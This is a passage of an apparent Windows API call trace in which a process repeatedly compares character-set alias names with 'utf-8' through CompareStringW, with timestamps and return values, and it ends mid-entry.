CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-154", cchCount1=10, lpString2="utf-8", cchCount2=5) returned 1 [0221.724] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="latin1-2-5", cchCount1=10, lpString2="utf-8", cchCount2=5) returned 1 [0221.724] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO8859Supp", cchCount1=13, lpString2="utf-8", cchCount2=5) returned 1 [0221.724] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO_10367-box", cchCount1=13, lpString2="utf-8", cchCount2=5) returned 1 [0221.724] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-155", cchCount1=10, lpString2="utf-8", cchCount2=5) returned 1 [0221.724] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO10367Box", cchCount1=13, lpString2="utf-8", cchCount2=5) returned 1 [0221.724] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO-8859-10", cchCount1=11, lpString2="utf-8", cchCount2=5) returned 1 [0221.724] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-157", cchCount1=10, lpString2="utf-8", cchCount2=5) returned 1 [0221.725] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l6", cchCount1=2, lpString2="utf-8", cchCount2=5) returned 1 [0221.725] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO_8859-10:1992", cchCount1=16, lpString2="utf-8", cchCount2=5) returned 1 [0221.725] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISOLatin6", cchCount1=11, lpString2="utf-8", cchCount2=5) returned 1 [0221.725] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="latin6", cchCount1=6, lpString2="utf-8", cchCount2=5) returned 1 [0221.725] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="latin-lap", cchCount1=9, lpString2="utf-8", cchCount2=5) returned 1 [0221.725] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lap", cchCount1=3, lpString2="utf-8", cchCount2=5) returned 1 [0221.725] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-158", cchCount1=10, lpString2="utf-8", cchCount2=5) returned 1 [0221.725] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO158Lap", cchCount1=11, lpString2="utf-8", cchCount2=5) returned 1 [0221.725] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JIS_X0212-1990", cchCount1=14, lpString2="utf-8", cchCount2=5) returned 1 [0221.725] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x0212", cchCount1=5, lpString2="utf-8", cchCount2=5) returned 3 [0221.725] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-159", cchCount1=10, lpString2="utf-8", cchCount2=5) returned 1 [0221.725] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO159JISX02121990", cchCount1=20, lpString2="utf-8", cchCount2=5) returned 1 [0221.725] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DS_2089", cchCount1=7, lpString2="utf-8", cchCount2=5) returned 1 [0221.725] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DS2089", cchCount1=6, lpString2="utf-8", cchCount2=5) returned 1 [0221.725] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO646-DK", cchCount1=9, lpString2="utf-8", cchCount2=5) returned 1 [0221.725] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dk", cchCount1=2, lpString2="utf-8", cchCount2=5) returned 1 [0221.725] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO646Danish", cchCount1=14, lpString2="utf-8", cchCount2=5) returned 1 [0221.725] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="us-dk", cchCount1=5, lpString2="utf-8", cchCount2=5) returned 1 [0221.725] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csUSDK", cchCount1=6, lpString2="utf-8", cchCount2=5) returned 1 [0221.725] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dk-us", cchCount1=5, lpString2="utf-8", cchCount2=5) returned 1 [0221.725] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csDKUS", cchCount1=6, lpString2="utf-8", cchCount2=5) returned 1 [0221.725] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JIS_X0201", cchCount1=9, lpString2="utf-8", cchCount2=5) returned 1 [0221.725] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X0201", cchCount1=5, lpString2="utf-8", cchCount2=5) returned 3 [0221.725] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csHalfWidthKatakana", cchCount1=19, lpString2="utf-8", cchCount2=5) returned 1 [0221.725] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KSC5636", cchCount1=7, lpString2="utf-8", cchCount2=5) returned 1 [0221.725] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO646-KR", cchCount1=9, lpString2="utf-8", cchCount2=5) returned 1 [0221.725] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csKSC5636", cchCount1=9, lpString2="utf-8", cchCount2=5) returned 1 [0221.725] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEC-MCS", cchCount1=7, lpString2="utf-8", cchCount2=5) returned 1 [0221.725] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dec", cchCount1=3, lpString2="utf-8", cchCount2=5) returned 1 [0221.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csDECMCS", cchCount1=8, lpString2="utf-8", cchCount2=5) returned 1 [0221.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hp-roman8", cchCount1=9, lpString2="utf-8", cchCount2=5) returned 1 [0221.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="roman8", cchCount1=6, lpString2="utf-8", cchCount2=5) returned 1 [0221.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="r8", cchCount1=2, lpString2="utf-8", cchCount2=5) returned 1 [0221.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csHPRoman8", cchCount1=10, lpString2="utf-8", cchCount2=5) returned 1 [0221.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="macintosh", cchCount1=9, lpString2="utf-8", cchCount2=5) returned 1 [0221.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mac", cchCount1=3, lpString2="utf-8", cchCount2=5) returned 1 [0221.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csMacintosh", cchCount1=11, lpString2="utf-8", cchCount2=5) returned 1 [0221.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IBM037", cchCount1=6, lpString2="utf-8", cchCount2=5) returned 1 [0221.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cp037", cchCount1=5, lpString2="utf-8", cchCount2=5) returned 1 [0221.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ebcdic-cp-us", cchCount1=12, lpString2="utf-8", cchCount2=5) returned 1 [0221.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ebcdic-cp-ca", cchCount1=12, lpString2="utf-8", cchCount2=5) returned 1 [0221.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ebcdic-cp-wt", cchCount1=12, lpString2="utf-8", cchCount2=5) returned 1 [0221.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ebcdic-cp-nl", cchCount1=12, lpString2="utf-8", cchCount2=5) returned 1 [0221.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csIBM037", cchCount1=8, lpString2="utf-8", cchCount2=5) returned 1 [0221.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IBM038", cchCount1=6, lpString2="utf-8", cchCount2=5) returned 1 [0221.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EBCDIC-INT", cchCount1=10, lpString2="utf-8", cchCount2=5) returned 1 [0221.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cp038", cchCount1=5, lpString2="utf-8", cchCount2=5) returned 1 [0221.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csIBM038", cchCount1=8, lpString2="utf-8", cchCount2=5) returned 1 [0221.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IBM273", cchCount1=6, lpString2="utf-8", cchCount2=5) returned 1 [0221.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CP273", cchCount1=5, lpString2="utf-8", cchCount2=5) returned 1 [0221.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csIBM273", cchCount1=8, lpString2="utf-8", cchCount2=5) returned 1 [0221.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IBM274", cchCount1=6, lpString2="utf-8", cchCount2=5) returned 1 [0221.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EBCDIC-BE", cchCount1=9, lpString2="utf-8", cchCount2=5) returned 1 [0221.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CP274", cchCount1=5, lpString2="utf-8", cchCount2=5) returned 1 [0221.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csIBM274", cchCount1=8, lpString2="utf-8", cchCount2=5) returned 1 [0221.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IBM275", cchCount1=6, lpString2="utf-8", cchCount2=5) returned 1 [0221.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EBCDIC-BR", cchCount1=9, lpString2="utf-8", cchCount2=5) returned 1 [0221.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cp275", cchCount1=5, lpString2="utf-8", cchCount2=5) returned 1 [0221.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csIBM275", cchCount1=8, lpString2="utf-8", cchCount2=5) returned 1 [0221.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IBM277", cchCount1=6, lpString2="utf-8", cchCount2=5) returned 1 [0221.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EBCDIC-CP-DK", cchCount1=12, lpString2="utf-8", cchCount2=5) returned 1 [0221.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EBCDIC-CP-NO", cchCount1=12, lpString2="utf-8", cchCount2=5) returned 1 [0221.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csIBM277", cchCount1=8, lpString2="utf-8", cchCount2=5) returned 1 [0221.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IBM278", cchCount1=6, lpString2="utf-8", cchCount2=5) returned 1 [0221.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CP278", cchCount1=5, lpString2="utf-8", cchCount2=5) returned 1 [0221.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ebcdic-cp-fi", cchCount1=12, lpString2="utf-8", cchCount2=5) returned 1 [0221.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ebcdic-cp-se", cchCount1=12, lpString2="utf-8", cchCount2=5) returned 1 [0221.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csIBM278", cchCount1=8, lpString2="utf-8", cchCount2=5) returned 1 [0221.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IBM280", cchCount1=6, lpString2="utf-8", cchCount2=5) returned 1 [0221.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CP280", cchCount1=5, lpString2="utf-8", cchCount2=5) returned 1 [0221.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ebcdic-cp-it", cchCount1=12, lpString2="utf-8", cchCount2=5) returned 1 [0221.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csIBM280", cchCount1=8, lpString2="utf-8", cchCount2=5) returned 1 [0221.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IBM281", cchCount1=6, lpString2="utf-8", cchCount2=5) returned 1 [0221.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EBCDIC-JP-E", cchCount1=11, lpString2="utf-8", cchCount2=5) returned 1 [0221.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cp281", cchCount1=5, lpString2="utf-8", cchCount2=5) returned 1 [0221.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csIBM281", cchCount1=8, lpString2="utf-8", cchCount2=5) returned 1 [0221.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IBM284", cchCount1=6, lpString2="utf-8", cchCount2=5) returned 1 [0221.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CP284", cchCount1=5, lpString2="utf-8", cchCount2=5) returned 1 [0221.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ebcdic-cp-es", cchCount1=12, lpString2="utf-8", cchCount2=5) returned 1 [0221.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csIBM284", cchCount1=8, lpString2="utf-8", cchCount2=5) returned 1 [0221.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IBM285", cchCount1=6, lpString2="utf-8", cchCount2=5) returned 1 [0221.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CP285", cchCount1=5, lpString2="utf-8", cchCount2=5) returned 1 [0221.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ebcdic-cp-gb", cchCount1=12, lpString2="utf-8", cchCount2=5) returned 1 [0221.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csIBM285", cchCount1=8, lpString2="utf-8", cchCount2=5) returned 1 [0221.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IBM290", cchCount1=6, lpString2="utf-8", cchCount2=5) returned 1 [0221.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cp290", cchCount1=5, lpString2="utf-8", cchCount2=5) returned 1 [0221.728] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EBCDIC-JP-kana", cchCount1=14, lpString2="utf-8", cchCount2=5) returned 1 [0221.728] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csIBM290", cchCount1=8, lpString2="utf-8", cchCount2=5) returned 1 [0221.728] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IBM297", cchCount1=6, lpString2="utf-8", cchCount2=5) returned 1 [0221.728] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cp297", cchCount1=5, lpString2="utf-8", cchCount2=5) returned 1 [0221.728] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ebcdic-cp-fr", cchCount1=12, lpString2="utf-8", cchCount2=5) returned 1 [0221.728] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csIBM297", cchCount1=8, lpString2="utf-8", cchCount2=5) returned 1 [0221.728] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IBM420", cchCount1=6, lpString2="utf-8", cchCount2=5) returned 1 [0221.728] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cp420", cchCount1=5, lpString2="utf-8", cchCount2=5) returned 1 [0221.728] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ebcdic-cp-ar1", cchCount1=13, lpString2="utf-8", cchCount2=5) returned 1 [0221.728] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csIBM420", cchCount1=8, lpString2="utf-8", cchCount2=5) returned 1 [0221.728] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IBM423", cchCount1=6, lpString2="utf-8", cchCount2=5) returned 1 [0221.728] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cp423", cchCount1=5, lpString2="utf-8", cchCount2=5) returned 1 [0221.728] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ebcdic-cp-gr", cchCount1=12, lpString2="utf-8", cchCount2=5) returned 1 [0221.728] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csIBM423", cchCount1=8, lpString2="utf-8", cchCount2=5) returned 1 [0221.728] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IBM424", cchCount1=6, lpString2="utf-8", cchCount2=5) returned 1 [0221.728] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cp424", cchCount1=5, lpString2="utf-8", cchCount2=5) returned 1 [0221.728] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ebcdic-cp-he", cchCount1=12, lpString2="utf-8", cchCount2=5) returned 1 [0221.728] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csIBM424", cchCount1=8, lpString2="utf-8", cchCount2=5) returned 1 [0221.728] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IBM437", cchCount1=6, lpString2="utf-8", cchCount2=5) returned 1 [0221.728] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cp437", cchCount1=5, lpString2="utf-8", cchCount2=5) returned 1 [0221.728] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="437", cchCount1=3, lpString2="utf-8", cchCount2=5) returned 1 [0221.728] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csPC8CodePage437", cchCount1=16, lpString2="utf-8", cchCount2=5) returned 1 [0221.728] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IBM500", cchCount1=6, lpString2="utf-8", cchCount2=5) returned 1 [0221.728] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CP500", cchCount1=5, lpString2="utf-8", cchCount2=5) returned 1 [0221.728] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ebcdic-cp-be", cchCount1=12, lpString2="utf-8", cchCount2=5) returned 1 [0221.728] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ebcdic-cp-ch", cchCount1=12, lpString2="utf-8", cchCount2=5) returned 1 [0221.728] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csIBM500", cchCount1=8, lpString2="utf-8", cchCount2=5) returned 1 [0221.728] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IBM775", cchCount1=6, lpString2="utf-8", cchCount2=5) returned 1 [0221.728] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cp775", cchCount1=5, lpString2="utf-8", cchCount2=5) returned 1 [0221.729] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csPC775Baltic", cchCount1=13, lpString2="utf-8", cchCount2=5) returned 1 [0221.729] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IBM850", cchCount1=6, lpString2="utf-8", cchCount2=5) returned 1 [0221.729] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cp850", cchCount1=5, lpString2="utf-8", cchCount2=5) returned 1 [0221.729] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="850", cchCount1=3, lpString2="utf-8", cchCount2=5) returned 1 [0221.729] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csPC850Multilingual", cchCount1=19, lpString2="utf-8", cchCount2=5) returned 1 [0221.729] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IBM851", cchCount1=6, lpString2="utf-8", cchCount2=5) returned 1 [0221.729] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cp851", cchCount1=5, lpString2="utf-8", cchCount2=5) returned 1 [0221.729] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="851", cchCount1=3, lpString2="utf-8", cchCount2=5) returned 1 [0221.729] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csIBM851", cchCount1=8, lpString2="utf-8", cchCount2=5) returned 1 [0221.729] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IBM852", cchCount1=6, lpString2="utf-8", cchCount2=5) returned 1 [0221.729] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cp852", cchCount1=5, lpString2="utf-8", cchCount2=5) returned 1 [0221.729] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="852", cchCount1=3, lpString2="utf-8", cchCount2=5) returned 1 [0221.729] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csPCp852", cchCount1=8, lpString2="utf-8", cchCount2=5) returned 1 [0221.729] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IBM855", cchCount1=6, lpString2="utf-8", cchCount2=5) returned 1 [0221.729] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cp855", cchCount1=5, lpString2="utf-8", cchCount2=5) returned 1 [0221.729] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="855", cchCount1=3, lpString2="utf-8", cchCount2=5) returned 1 [0221.729] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csIBM855", cchCount1=8, lpString2="utf-8", cchCount2=5) returned 1 [0221.729] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IBM857", cchCount1=6, lpString2="utf-8", cchCount2=5) returned 1 [0221.729] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cp857", cchCount1=5, lpString2="utf-8", cchCount2=5) returned 1 [0221.729] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="857", cchCount1=3, lpString2="utf-8", cchCount2=5) returned 1 [0221.729] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csIBM857", cchCount1=8, lpString2="utf-8", cchCount2=5) returned 1 [0221.729] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IBM860", cchCount1=6, lpString2="utf-8", cchCount2=5) returned 1 [0221.729] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cp860", cchCount1=5, lpString2="utf-8", cchCount2=5) returned 1 [0221.729] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="860", cchCount1=3, lpString2="utf-8", cchCount2=5) returned 1 [0221.729] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csIBM860", cchCount1=8, lpString2="utf-8", cchCount2=5) returned 1 [0221.729] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IBM861", cchCount1=6, lpString2="utf-8", cchCount2=5) returned 1 [0221.729] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cp861", cchCount1=5, lpString2="utf-8", cchCount2=5) returned 1 [0221.729] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="861", cchCount1=3, lpString2="utf-8", cchCount2=5) returned 1 [0221.729] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cp-is", cchCount1=5, lpString2="utf-8", cchCount2=5) returned 1 [0221.729] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csIBM861", cchCount1=8, lpString2="utf-8", cchCount2=5) returned 1 [0221.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IBM862", cchCount1=6, lpString2="utf-8", cchCount2=5) returned 1 [0221.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cp862", cchCount1=5, lpString2="utf-8", cchCount2=5) returned 1 [0221.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="862", cchCount1=3, lpString2="utf-8", cchCount2=5) returned 1 [0221.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csPC862LatinHebrew", cchCount1=18, lpString2="utf-8", cchCount2=5) returned 1 [0221.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IBM863", cchCount1=6, lpString2="utf-8", cchCount2=5) returned 1 [0221.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cp863", cchCount1=5, lpString2="utf-8", cchCount2=5) returned 1 [0221.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="863", cchCount1=3, lpString2="utf-8", cchCount2=5) returned 1 [0221.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csIBM863", cchCount1=8, lpString2="utf-8", cchCount2=5) returned 1 [0221.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IBM864", cchCount1=6, lpString2="utf-8", cchCount2=5) returned 1 [0221.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cp864", cchCount1=5, lpString2="utf-8", cchCount2=5) returned 1 [0221.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csIBM864", cchCount1=8, lpString2="utf-8", cchCount2=5) returned 1 [0221.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IBM865", cchCount1=6, lpString2="utf-8", cchCount2=5) returned 1 [0221.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cp865", cchCount1=5, lpString2="utf-8", cchCount2=5) returned 1 [0221.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="865", cchCount1=3, lpString2="utf-8", cchCount2=5) returned 1 [0221.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csIBM865", cchCount1=8, lpString2="utf-8", cchCount2=5) returned 1 [0221.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IBM866", cchCount1=6, lpString2="utf-8", cchCount2=5) returned 1 [0221.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cp866", cchCount1=5, lpString2="utf-8", cchCount2=5) returned 1 [0221.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="866", cchCount1=3, lpString2="utf-8", cchCount2=5) returned 1 [0221.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csIBM866", cchCount1=8, lpString2="utf-8", cchCount2=5) returned 1 [0221.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IBM868", cchCount1=6, lpString2="utf-8", cchCount2=5) returned 1 [0221.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CP868", cchCount1=5, lpString2="utf-8", cchCount2=5) returned 1 [0221.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cp-ar", cchCount1=5, lpString2="utf-8", cchCount2=5) returned 1 [0221.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csIBM868", cchCount1=8, lpString2="utf-8", cchCount2=5) returned 1 [0221.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IBM869", cchCount1=6, lpString2="utf-8", cchCount2=5) returned 1 [0221.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cp869", cchCount1=5, lpString2="utf-8", cchCount2=5) returned 1 [0221.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="869", cchCount1=3, lpString2="utf-8", cchCount2=5) returned 1 [0221.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cp-gr", cchCount1=5, lpString2="utf-8", cchCount2=5) returned 1 [0221.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csIBM869", cchCount1=8, lpString2="utf-8", cchCount2=5) returned 1 [0221.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IBM870", cchCount1=6, lpString2="utf-8", cchCount2=5) returned 1 [0221.731] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CP870", cchCount1=5, lpString2="utf-8", cchCount2=5) returned 1 [0221.731] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ebcdic-cp-roece", cchCount1=15, lpString2="utf-8", cchCount2=5) returned 1 [0221.731] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ebcdic-cp-yu", cchCount1=12, lpString2="utf-8", cchCount2=5) returned 1 [0221.731] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csIBM870", cchCount1=8, lpString2="utf-8", cchCount2=5) returned 1 [0221.731] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IBM871", cchCount1=6, lpString2="utf-8", cchCount2=5) returned 1 [0221.731] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CP871", cchCount1=5, lpString2="utf-8", cchCount2=5) returned 1 [0221.731] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ebcdic-cp-is", cchCount1=12, lpString2="utf-8", cchCount2=5) returned 1 [0221.731] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csIBM871", cchCount1=8, lpString2="utf-8", cchCount2=5) returned 1 [0221.731] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IBM880", cchCount1=6, lpString2="utf-8", cchCount2=5) returned 1 [0221.731] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cp880", cchCount1=5, lpString2="utf-8", cchCount2=5) returned 1 [0221.731] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EBCDIC-Cyrillic", cchCount1=15, lpString2="utf-8", cchCount2=5) returned 1 [0221.731] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csIBM880", cchCount1=8, lpString2="utf-8", cchCount2=5) returned 1 [0221.731] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IBM891", cchCount1=6, lpString2="utf-8", cchCount2=5) returned 1 [0221.731] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cp891", cchCount1=5, lpString2="utf-8", cchCount2=5) returned 1 [0221.731] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csIBM891", cchCount1=8, lpString2="utf-8", 